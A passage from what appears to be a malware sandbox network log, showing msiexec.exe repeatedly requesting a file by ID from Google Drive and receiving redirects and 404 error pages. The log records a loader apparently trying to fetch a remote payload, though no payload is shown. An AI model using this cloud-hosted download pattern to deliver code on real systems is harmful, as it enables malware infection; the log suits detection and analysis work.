                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:30 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:30 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'nonce-Z0jdbk59jh7_HnaVLGULgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  61192.168.2.550037142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:31 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:31 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC4REiFVw8sPYxN5QLQH-rVsAzsjhBRvRRzK6krqejdV1iNF1dM7TJpPvRAYXENA_ooO9rBtQG8
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:31 GMT
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-uRln4_vuTGqVFwysL6ZxPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:31 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 59 66 50 4b 64 64 67 30 54 6a 31 42 79 68 59 69 72 32 78 6e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CYfPKddg0Tj1ByhYir2xnA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  62192.168.2.550038142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:32 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:33 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:32 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-f_zDWd4UrEMC42-YBQivSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  63192.168.2.550039142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:33 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:34 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgS6HVrKz4TIH4icX86O5pVEAwConAKx9bJayRV9ponD18iLKauTy0QbTO6JXEWnRSgyEMJvMqg
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:34 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-ZhOHmlDLJppOzW87xS9dOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 6e 4c 6f 37 32 72 62 6d 53 72 51 52 45 35 78 7a 6f 6c 72 77 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AnLo72rbmSrQRE5xzolrww">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  64192.168.2.550040142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:35 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:35 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:35 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-_MyXDtl7No3hc3btSzEv5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  65192.168.2.550041142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:36 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:36 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgS6c-u4qUQ1dPI4Jff6fNN6aSpuTZr5GIFtv6tsARWRFq190qlJUVls6sTXz_7_gb5-
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:36 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'nonce-AEBfZAQt09BxH4Ecj_msPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 79 54 36 4b 74 67 78 2d 34 66 43 34 68 74 73 44 41 56 46 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VyT6Ktgx-4fC4htsDAVFUA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  66192.168.2.550042142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:37 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:37 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:37 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-skfrmRBqqDbB3EbDQiGk6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  67192.168.2.550043142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:38 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:38 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgTxZmnddbyWnozy_IUM0QG1d0YUaTgXfAaema2YNxrMVnaCr0nkYG4LLF5L0HPKhNq7
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:38 GMT
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-9ep0vW_HI2VjBZOOUU_2nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
